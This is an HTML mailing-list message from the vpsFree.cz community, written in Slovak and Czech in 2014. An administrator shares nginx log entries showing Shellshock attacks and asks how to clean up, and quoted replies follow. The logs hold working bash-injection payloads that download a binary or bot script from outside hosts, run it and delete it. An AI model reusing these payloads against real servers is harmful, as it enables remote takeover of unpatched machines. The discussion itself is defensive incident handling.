<div dir="ltr">Ja mam v logoch nasledovne<div><br></div><div><div>root@yuna /home/rene # grep '() {' /var/log/nginx/*</div><div>/var/log/nginx/access.log:70.42.149.67 - - [28/Sep/2014:08:18:37 +0200] "GET /test HTTP/1.0" 200 193 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z <a href="http://74.201.85.69/ec.z;chmod"><font color="red"><b>MailScanner warning: numerical links are often malicious:</b></font> 74.201.85.69/ec.z;chmod</a> +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22"</div><div>/var/log/nginx/access.log:70.42.149.67 - - [28/Sep/2014:08:18:37 +0200] "GET / HTTP/1.0" 200 193 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z <a href="http://74.201.85.69/ec.z;chmod"><font color="red"><b>MailScanner warning: numerical links are often malicious:</b></font> 74.201.85.69/ec.z;chmod</a> +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22"</div><div>/var/log/nginx/access.log:70.42.149.67 - - [28/Sep/2014:08:18:37 +0200] "GET /cgi-bin/test.sh HTTP/1.0" 200 193 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z <a href="http://74.201.85.69/ec.z;chmod"><font color="red"><b>MailScanner warning: numerical links are often malicious:</b></font> 74.201.85.69/ec.z;chmod</a> +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22"</div><div>/var/log/nginx/access.log.1:209.126.230.72 - - [25/Sep/2014:07:26:09 +0200] "GET / HTTP/1.0" 200 193 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (<a href="http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html">http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html</a>)"</div><div>/var/log/nginx/access.log.1:89.207.135.125 - - [25/Sep/2014:11:26:32 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 200 193 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"</div><div>/var/log/nginx/access.log.1:54.251.83.67 - - [27/Sep/2014:21:35:34 +0200] "GET / HTTP/1.1" 200 193 "-" "() { :;}; /bin/bash -c \x22echo testing9123123\x22; /bin/uname -a"</div><div><font color="#ff0000">/var/log/nginx/access.log.1:137.189.52.234 - - [27/Sep/2014:23:18:23 +0200] "GET /cgi-bin/test-cgi HTTP/1.0" 200 193 "-" "() { :;}; /bin/bash -c \x22wget <a href="http://stablehost.us/bots/regular.bot">http://stablehost.us/bots/regular.bot</a> -O /tmp/sh;curl -o /tmp/sh <a href="http://stablehost.us/bots/regular.bot;sh">http://stablehost.us/bots/regular.bot;sh</a> /tmp/sh;rm -rf /tmp/sh\x22"</font></div></div><div><br></div><div>vyzera to trochu zle :-/ ... co odporucate s tym robit? killnut len podozrive procesy? a pohladat nejake stopy po tom, ci sa nezapinaju po restarte?</div><div><br></div></div><div class="gmail_extra"><br><div class="gmail_quote">2014-09-29 10:10 GMT+02:00 Michal Miklos <span dir="ltr"><<a href="mailto:mimik@mimik.sk" target="_blank">mimik@mimik.sk</a>></span>:<br><blockquote class="gmail_quote" style="margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex">jedine si zistit ci mas dobru verziu bashu.<br>
<div class="HOEnZb"><div class="h5"><br>
<br>
On 29 Sep 2014, at 10:08, Jan B. Kolář <<a href="mailto:janbivoj.kolar@zazen-nudu.cz">janbivoj.kolar@zazen-nudu.cz</a>> wrote:<br>
<br>
> Ahoj,<br>
><br>
> možná hloupá otázka - dá se nějak z logu zjistit, zda ten průnik byl úspěšný či nikoliv?<br>
><br>
> Honza<br>
><br>
> On <a href="tel:29.9.2014%2010" value="+420299201410">29.9.2014 10</a>:02, Petr Krcmar wrote:<br>
>> Dne 29.9.2014 v 09:57 Jiří Medvěd napsal(a):<br>
>>> Hele,<br>
>>><br>
>>> z jineho stroje:<br>
>> Ano, to jsem našel taky. Zjevně se tam někdo snaží tlačit rootkit:<br>
>><br>
>> <a href="http://petrkrcmar.blog.root.cz/2014/09/29/utoky-na-bash-uz-bezi/" target="_blank">http://petrkrcmar.blog.root.cz/2014/09/29/utoky-na-bash-uz-bezi/</a><br>
>><br>
><br>
> _______________________________________________<br>
> Community-list mailing list<br>
> <a href="mailto:Community-list@lists.vpsfree.cz">Community-list@lists.vpsfree.cz</a><br>
> <a href="http://lists.vpsfree.cz/listinfo/community-list" target="_blank">http://lists.vpsfree.cz/listinfo/community-list</a><br>
<br>
</div></div><br>_______________________________________________<br>
Community-list mailing list<br>
<a href="mailto:Community-list@lists.vpsfree.cz">Community-list@lists.vpsfree.cz</a><br>
<a href="http://lists.vpsfree.cz/listinfo/community-list" target="_blank">http://lists.vpsfree.cz/listinfo/community-list</a><br>
<br></blockquote></div><br></div>